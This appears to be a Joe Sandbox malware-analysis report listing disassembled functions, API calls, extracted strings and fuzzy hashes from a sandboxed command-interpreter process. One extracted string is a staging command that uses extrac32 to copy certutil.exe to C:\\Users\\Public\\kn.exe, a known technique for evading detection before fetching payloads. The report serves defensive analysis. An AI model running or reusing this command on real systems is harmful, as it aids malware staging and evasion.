Instruction ID: 5bc22195d5c49c940fbc64b3952c9c6ffd7bc7490bcfa8627a83486847190ee3
Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
Instruction Fuzzy Hash: E6B01254F25402E1D708BB72DC9106557A07F5C712FE00471C00E82570DE9CD5DFCB20

Function 00007FF7823DF8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON

Download Yara Rule

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7823DF52A,00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF8DE
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF8FB
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF951
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF96B
wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DFA8E
_get_osfhandle.MSVCRT ref: 00007FF7823DFB14
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DFB2D
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DFBEA
_get_osfhandle.MSVCRT ref: 00007FF7823DF996

Part of subcall function 00007FF7823E0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7823F849D,?,?,?,00007FF7823FF0C7), ref: 00007FF7823E0045
Part of subcall function 00007FF7823E0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7823FF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823E0071
Part of subcall function 00007FF7823E0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E0092
Part of subcall function 00007FF7823E0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823E00A7
Part of subcall function 00007FF7823E0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E0181

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823ED401
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823ED41B
longjmp.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823ED435
longjmp.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823ED480

Strings

=,;, xrefs: 00007FF7823DF8C8
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7823DF90E

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
API String ID: 3964947564-518410914
Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
Instruction ID: e1df0e3f0cde2994c1b9fb7916e432905cb1a0b2b9e88552968116e73ac4ca0a
Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
Instruction Fuzzy Hash: CC02BE25A19A069AFB14BB21E8641B8F6A4FF44757FF04179D90E43AE4DFBCA844C730

Function 00007FF7823E02A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00007FF7823E02C2
_wcsicmp.MSVCRT ref: 00007FF7823E02E4
_wcsicmp.MSVCRT ref: 00007FF7823E0306
_wcsicmp.MSVCRT ref: 00007FF7823E0328
_wcsicmp.MSVCRT ref: 00007FF7823E034A
_wcsicmp.MSVCRT ref: 00007FF7823E0368
_wcsicmp.MSVCRT ref: 00007FF7823E6CF2
_wcsicmp.MSVCRT ref: 00007FF7823E6D61
_wcsicmp.MSVCRT ref: 00007FF7823E6D7F
_wcsicmp.MSVCRT ref: 00007FF7823E6D9D
_wcsicmp.MSVCRT ref: 00007FF7823E6DBB
iswspace.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,?,?,00007FF7823DE164), ref: 00007FF7823E6E01
wcschr.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,?,?,00007FF7823DE164), ref: 00007FF7823E6E2C

Strings

REM/?, xrefs: 00007FF7823E0361
;, xrefs: 00007FF7823E03FD
=,;, xrefs: 00007FF7823E6E1C
FOR/?, xrefs: 00007FF7823E02DD, 00007FF7823E6CE9
REM, xrefs: 00007FF7823E0343
IF/?, xrefs: 00007FF7823E0321
FOR, xrefs: 00007FF7823E02BB

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsicmp$iswspacewcschr
String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
API String ID: 840959033-3627297882
Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
Instruction ID: bb0e50cd9920d0f5e81fb02391afb665f856d809f670bac543ce4c8103cfdb7e
Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
Instruction Fuzzy Hash: BAD17D25A0864396FB50BB21E4242B9BAA0FF44B46FF44079D94D47A95DFBCE849CB30

Function 00007FF7823E081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E084E
_wcsicmp.MSVCRT ref: 00007FF7823E088E
_wcsicmp.MSVCRT ref: 00007FF7823E08AC
_wcsicmp.MSVCRT ref: 00007FF7823E08CA
_wcsicmp.MSVCRT ref: 00007FF7823E08E8
_wcsicmp.MSVCRT ref: 00007FF7823E0906
_wcsicmp.MSVCRT ref: 00007FF7823E0924
_wcsicmp.MSVCRT ref: 00007FF7823E093E
_wcsicmp.MSVCRT ref: 00007FF7823E095C

Strings

CMDEXTVERSION, xrefs: 00007FF7823E08C0
ERRORLEVEL, xrefs: 00007FF7823E08A2
DATE, xrefs: 00007FF7823E08FC
HIGHESTNUMANODENUMBER, xrefs: 00007FF7823E0952
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF7823E0835
CMDCMDLINE, xrefs: 00007FF7823E08DE
RANDOM, xrefs: 00007FF7823E0934
TIME, xrefs: 00007FF7823E091A

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsicmp$EnvironmentVariable
String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
API String ID: 198002717-267741548
Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
Instruction ID: 81dce35f078de9de8548cd1d8424c466a29977f0982f50db8c9ed547376c9713
Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
Instruction Fuzzy Hash: ED512F25A0864395E6507F12E820179EBA0FF59B82FE49079D90E53A65DFBCE448C770

Function 00007FF7823DEF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON

Download Yara Rule

APIs

iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF000
wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF031
iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF0D6

Strings

Ungetting: '%s', xrefs: 00007FF7823ED0E1
()|&=,;", xrefs: 00007FF7823DF3EC, 00007FF7823DF6D0
=,;, xrefs: 00007FF7823DEF9D, 00007FF7823DF1CE, 00007FF7823DF342, 00007FF7823DF61A

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: iswdigitiswspacewcschr
String ID: ()|&=,;"$=,;$Ungetting: '%s'
API String ID: 1595556998-2755026540
Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
Instruction ID: fbc8f7448039f819c41ba7784a869135ce78cc80f9b59a8e4388052ce38108d4
Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
Instruction Fuzzy Hash: 5522BD69E1C65281FA607B12A4A8279F6A0BF04793FF4417AD94D43AE4CFBCE845C731

Function 00007FF7823DD3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
wcschr.MSVCRT ref: 00007FF7823DD4EE
iswspace.MSVCRT ref: 00007FF7823DD54D
wcschr.MSVCRT ref: 00007FF7823DD569
wcschr.MSVCRT ref: 00007FF7823DD58C
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD5EE
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD605
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD61F
HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD633

Strings

=,;, xrefs: 00007FF7823DD4D0
", xrefs: 00007FF7823DD5AB

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$Processwcschr$Alloc$Sizeiswspace
String ID: "$=,;
API String ID: 3545743878-4143597401
Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
Instruction ID: 571098adb341530978b79eb45e1e2b674326e52859c03c4e449c667151526290
Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
Instruction Fuzzy Hash: BAC1C566E0965681EB657F11D024379FAA1FF44F46FE580B9CE4E03B94EFBCA845C220

Function 00007FF7823F5BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823F5CD5
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823F5D54

Strings

%hs!%p: , xrefs: 00007FF7823F5D1F
[%hs(%hs)], xrefs: 00007FF7823F5E04
%hs(%u)\%hs!%p: , xrefs: 00007FF7823F5D01
ReturnHr, xrefs: 00007FF7823F5C97
Msg:[%ws] , xrefs: 00007FF7823F5DC2
CallContext:[%hs] , xrefs: 00007FF7823F5DDD
FailFast, xrefs: 00007FF7823F5C85
%hs(%d) tid(%x) %08X %ws, xrefs: 00007FF7823F5D6D
(caller: %p) , xrefs: 00007FF7823F5D3F
, xrefs: 00007FF7823F5DA7
LogHr, xrefs: 00007FF7823F5C8E
Exception, xrefs: 00007FF7823F5CA0
[%hs], xrefs: 00007FF7823F5E1D

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CurrentFormatMessageThread
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
API String ID: 2411632146-3173542853
Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
Instruction ID: ac4c38d14630c56fe9929e5f62f2ccda7ed27d6d5b1af9f2374a9233aa42ee7d
Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
Instruction Fuzzy Hash: 3F618C72A0964282EA64EF51A4645B5A7A0FF44B86FE4113EDE0D03B54DFBCEA50CB20

Function 00007FF7823E26E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON

Download Yara Rule

APIs

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E277D
_open_osfhandle.MSVCRT ref: 00007FF7823E279E

Strings

con, xrefs: 00007FF7823E27EF

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CreateFile_open_osfhandle
String ID: con
API String ID: 2905481843-4257191772
Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
Instruction ID: e57ad09f283ae0080bcc3959904559ca1598c88aa943c1da17c19d13a083865d
Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
Instruction Fuzzy Hash: 1471F9366086819AE360AF15E410379FBA0FB89B62FA44235DA5D43FD4DF7CD489CB20

Function 00007FF7823F93E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E33A8: iswspace.MSVCRT(?,?,00000000,00007FF7823FD6EE,?,?,?,00007FF7823F0632), ref: 00007FF7823E33C0

wcsrchr.MSVCRT ref: 00007FF7823F9465

Part of subcall function 00007FF7823E9158: RtlCaptureContext.NTDLL ref: 00007FF7823E9163
Part of subcall function 00007FF7823E9158: RtlLookupFunctionEntry.NTDLL ref: 00007FF7823E9182
Part of subcall function 00007FF7823E9158: RtlVirtualUnwind.NTDLL ref: 00007FF7823E91CF
Part of subcall function 00007FF7823E9158: __raise_securityfailure.LIBCMT ref: 00007FF7823E9245

wcschr.MSVCRT ref: 00007FF7823F9486
wcsrchr.MSVCRT ref: 00007FF7823F94C1
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823F94E5
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F94FC
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F9519
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823F952A
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F9541
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F955E
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823F9587
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F95E1
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823F95FD

Strings

, xrefs: 00007FF7823F95BA

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
String ID:
API String ID: 3829876242-3916222277
Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
Instruction ID: 0482164adcc7bb0307b6bd79035dee3cb905b53062f9d2a002d757b89c67f809
Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
Instruction Fuzzy Hash: 8161A626B0864286EA54AF11E42017DFBA0FFC9B56F958178DE0D07B94DF7CE845C720

Function 00007FF782401A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF782401AA6
memset.MSVCRT ref: 00007FF782401ACC

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF782401B3E
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF782401B67
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF782401BD7
_wcsicmp.MSVCRT ref: 00007FF782401C05
_wcsicmp.MSVCRT ref: 00007FF782401C34
_wcsicmp.MSVCRT ref: 00007FF782401C63
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF782401C89
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF782401CA9

Strings

REFS, xrefs: 00007FF782401C29
CSVFS, xrefs: 00007FF782401C58
NTFS, xrefs: 00007FF782401BFA

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
String ID: CSVFS$NTFS$REFS
API String ID: 3510147486-2605508654
Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
Instruction ID: 543bea88e147652afac942a4eb9095c94269ec4a17898ab9d36f3e418bd06fd5
Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
Instruction Fuzzy Hash: 2C617232708BC2CAEBA19F21D8547E9B7A4FB45B86F944035DA0E4B758DFB8D544C720

Function 00007FF7823D72B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON

Download Yara Rule

APIs

longjmp.MSVCRT(?,00000000,00000000,00007FF7823D7279,?,?,?,?,?,00007FF7823DBFA9), ref: 00007FF7823F4485

Strings

NEQ , xrefs: 00007FF7823F478B
GEQ , xrefs: 00007FF7823F47C1
LSS , xrefs: 00007FF7823F4799
GTR , xrefs: 00007FF7823F47B5
IF /?, xrefs: 00007FF7823F4664
LEQ , xrefs: 00007FF7823F47A7
== , xrefs: 00007FF7823F4765
REM /?, xrefs: 00007FF7823F4678
FOR /?, xrefs: 00007FF7823F4654
FOR, xrefs: 00007FF7823F4535
EQU , xrefs: 00007FF7823F477D

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: longjmp
String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
API String ID: 1832741078-366822981
Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
Instruction ID: b2caae009926fa7775563b742dbe570a1ffe3cf393c90a8ca08a74843ee67072
Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
Instruction Fuzzy Hash: 7FC18320F0C64282EB64FB1565645B8A7A1BB46B86FF0507ADF0D67E91CFBCE845C360

Function 00007FF7823DB998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD

memset.MSVCRT ref: 00007FF7823DBA2B
wcschr.MSVCRT ref: 00007FF7823DBA8A
wcschr.MSVCRT ref: 00007FF7823DBAAA

Strings

:.\, xrefs: 00007FF7823DBAA3
=,;, xrefs: 00007FF7823DBC9C
=,;+/[] ", xrefs: 00007FF7823DBA83
-, xrefs: 00007FF7823EC3EA

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
